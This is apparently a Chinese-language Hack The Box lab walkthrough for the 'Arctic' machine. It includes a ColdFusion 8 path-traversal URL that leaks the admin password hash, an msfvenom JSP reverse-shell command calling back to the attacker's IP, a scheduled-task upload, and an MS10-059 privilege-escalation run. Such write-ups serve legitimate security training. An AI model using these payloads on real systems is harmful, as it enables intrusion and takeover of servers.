hackthebox- Arctic (考点:ColdFusion安全/windows)
1、nmap
看不懂有什么有价值的,连80都没有。
只能带着端口进去看。10.10.10.11:8500
信息搜集了一番,是coldfusion,有好多文件,找到带administrator的那个,就看到登录框了
2、cold漏洞利用
找漏洞,找到这个漏洞
执行
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
出来密码
拉去MD5破解https://www.somd5.com/
得到密码,登录进去。
找上传,在scheduled tasks这里。
搜了下cold是java写的,造java的shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f raw > shell.jsp
于是,上传,
在shell.jsp路径下,开启你本机的http服务python -m SimpleHTTPServer 80,
在url那一栏里写入你http的shell.jsp。如此靶机服务请求就能调用的你shell了
http://你的ip/shell.jsp
但是不知道最后一个File路径填什么
再mapping那里。可以看到path
那我填右上角的那个,对应在网址上输入的就是左上角的。
上传那里要填写完整,且上面打勾,才能成功输出到路径里
C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
OK了,,弹出去后,点击开始运行这个任务。
然后网址输入相应路径,就可以收到了
3、提权
进去直接systeminfo,利用这个工具找提权
python windows-exploit-suggester.py --systeminfo info.txt --database 2020-04-08-mssb.xls
看到了著名的ms10-059
win有很多传文件方法,我习惯用smb,在以前的win系列靶机文章里写了很多次了
传进去,执行,收到搞定
copy \\10.10.14.3\share\MS10-059.exeMS10-059.exe 10.10.14.3 31337
hackthebox- Arctic (考点:ColdFusion安全/windows)相关推荐
- Hackthebox:Arctic Walkthrough
预备知识 使用了msfvenom,不想看的可以跳过 浏览器信息收集尤其是细节发现服务信息不能过度依赖工具 MS10-059.smbserver.jsp reverse shell 信息收集和获取立足点 ...
- HackTheBox: Arctic靶场
废话不多说直接开始: 第一步是在计算机上运行NMAP: # Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC ...
- hackthebox-optimum(考点:hfs/windows)不用msf
用msf做很快.这台靶机很多人做以及写的writeup都是msf.但针对oscp备考者,本篇文章不用msf 1.nmap 就一个80,提示是HFS 2.3 2. hfs漏洞利用 直接搜searchsp ...
- hackthebox-granny(考点:webdav/windows)
1.nmap 就80,上去看看,是个IIS但一片贫瘠,拿dirbuster扫也是一片荒凉 这说明信息搜集还没到位,还要再看看nmap的扫描 扫描里关于webdav的scan信息显示得很详细,可以get ...
- HTB靶场系列 Windows靶机 Arctic靶机
这台靶机设定的30秒响应速度真的让人绝望.正儿八经的每做一个动作就可以玩半天手机 勘探 nmap nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ...
- HTB Arctic[ATTCK模型]writeup系列7
目录 0x00 靶机情况 0x01 ATT&CK ATT&CK能用来干什么? 网空威胁行为体(CyberThreat Actors) ATT&CK模型 TTP的定义 0x02 ...
- 禁止更改计算机名_【复习收藏】计算机操作系统考点归纳
往期专升本知识点 点击查看: [快来收藏!]专升本英语重点词汇 [建议收藏]专升本语文考点知识集合!(2) [建议收藏]专升本语文考点知识集合!(1) about等常见介词短语集合啦,专升本英语必看! ...
- 将文件从 Linux 传输到 Windows
很多时候,在参与活动中,我发现自己需要将工具或有效载荷从我的Kali linux攻击箱复制到受损的Windows机器上. ColdFusion服务器,并能够上传一个CFM webshell.这是一个非 ...
- 吐血规劝!程序员防猝死终极指南
快过年了,跟我可爱的小侄子通了个电话,上来就说,"叔叔你头发怎么变少了",我很痛心,我的小侄子,年纪轻轻的,眼神已经这么不好使了.但转念一想,这也是他对我的一种关心,作为叔叔,也该 ...
最新文章
- 《SQL Server 管理与维护指南》章节目录
- linux系统宿主定制之初窥门径
- 韦布望远镜睁眼看到第一缕星光,镜面校准进行时
- python IDE- IDLE
- 【OpenCV学习笔记4】OpenCV GUI 之VCWin32+OpenCV 实现细胞计数
- Nginx + PHP/PHP-FPM安装配置示例
- apimodel 可以重复吗_【惠蓉保】同时买了“惠蓉保”和百万医疗,可以重复报销吗?“惠蓉保”这么说...
- H5之 Canvas图形实现
- 将Java类作为子进程运行
- Spring Boot通过@RequestParam接收前端表单传来的数据
- Apache Shiro java安全框架
- 自创本派高考理数试题集现在发布
- python 代码命令大全-深度学习中python常用命令
- 用Winhex软件定位NTFS文件系统的不明白之处
- macOS 如何设置壁纸
- 手机号码正则表达式匹配
- 小学生听力测试软件,亲测十款小学英语APP,为了孩子请收藏
- canvas实现虚线带箭头效果
- hihoCoder - 1272 买零食
- mailto的用法及attach附件测试结果。